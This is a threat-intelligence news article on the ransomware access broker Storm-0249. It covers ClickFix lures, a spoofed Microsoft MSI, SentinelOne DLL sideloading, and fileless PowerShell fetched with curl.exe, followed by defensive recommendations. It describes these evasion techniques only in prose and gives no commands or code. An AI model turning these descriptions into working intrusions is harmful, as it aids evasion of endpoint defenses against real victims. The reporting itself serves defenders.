Initial access broker Storm‑0249 has shifted from noisy, easily detected phishing attacks to highly targeted campaigns that are much harder to detect and stop.
According to ReliaQuest, Storm-0249, which is known for brokering network access to ransomware operators, is increasingly weaponizing legitimate endpoint detection and response (EDR) processes as well as built-in Windows utilities to carry out post-compromise activities. This includes poking around compromised systems to gather information, setting up command-and-control (C2) channels, and staying persistent in the environment. These new tactics let Storm‑0249 slip past defenses, get deep into networks, and operate almost completely under the radar, the security vendor said.
‘Newcomer Energy’ from Storm-0249
“As an emerging IAB, Storm-0249 brings fresh newcomer energy to an already volatile landscape,” Brandon Tirado, director of threat intelligence at ReliaQuest, tells Dark Reading. “Its rapid pivot from traditional ransomware with broad generic phishing to stealthy, loader-centric and ClickFix-style campaigns lowers the technical and financial barrier for RaaS affiliates to gain fast, quiet access,” he says.
This innovation-by-newcomer dynamic could accelerate copycat adoption across the IAB ecosystem, meaning defenders can no longer afford to dismiss low-reputation or recently observed actors, Tirado says. “Every novel threat must be treated as potentially high impact from day one.”
Storm‑0249’s recent activity begins with a tactic known as ClickFix, which is a social‑engineering move that convinces users to paste and run a harmless‑looking command in the Windows Run box. Instead of fixing anything, however, the command quietly pulls down a spoofed Microsoft support installer from a phishing site masquerading as a legitimate Microsoft support portal. Once launched, the MSI abuses Windows Installer’s built‑in “SYSTEM” privileges, letting the attackers drop files into protected directories and execute their payload with full, system‑level control.
Inside the MSI, according to ReliaQuest, is a Trojanized Dynamic Link Library (DLL) that masquerades as a legitimate component of SentinelOne’s EDR software. The malicious installer places the weaponized DLL in the system’s AppData folder right next to a legitimate SentinelOne executable that the attackers also bring along in the attack. When the SentinelOne executable runs and searches for required files, it loads the malicious DLL instead of the legitimate one, enabling the attackers to execute malicious code without triggering typical signature-based alerts.
Such DLL sideloading attacks are not new. But Storm-0249’s integration of these tactics into its playbook reflects a broader evolution among threat actors toward “identity-based and evasion-heavy tactics” ReliaQuest said. Importantly, Storm-0249’s technique is easily adaptable and would work equally with other EDR platforms and not just SentinelOne’s, the security vendor added.
Leveraging Legit Windows Utilities
In some recent attacks, ReliaQuest observed Storm-0249 leveraging built-in Windows tools, such as curl.exe, to fetch malicious PowerShell scripts from URLs that appeared to originate from Microsoft. Developers, sysadmins and others use curl.exe daily to download files, test APIs, automate tasks, so Storm-0249’s goal in using it is to blend in with normal activity and evade detection, ReliaQuest said.
The malicious scripts are piped directly into PowerShell memory, where they are executed without ever touching the disk. Because these commands are carried out by legitimate system utilities that are widely used for everyday IT operations, traditional endpoint defenses often fail to detect them, ReliaQuest said.
“Fileless PowerShell executes entirely in memory and DLL sideloading abuses trusted, signed binaries,” notes Tirado. “So, both techniques bypass signature-based tools that still dominate many stacks.”
He assesses that threat actors like Storm-0249 deliberately lean into these well-known blind spots to establish credibility quickly. Effective countermeasures include behavioral analytics that flag anomalous DLL loads from unexpected paths, EDR baselining, and DNS monitoring that flags connections to domains that have been around for less than 90 days.
The most exploited security gaps, in Tirado’s opinion, remain unmonitored AppData and registry hives, over-reliance on perimeter and signature based defenses, and whitelisting, without any constraints, the binaries that threat actors typically use in living-off-the-land binaries (LOLBins) attacks. Organizations should enforce strict LOLBin restrictions such as PowerShell Constrained Language Mode, segment networks aggressively, and deploy automated response playbooks, he says.
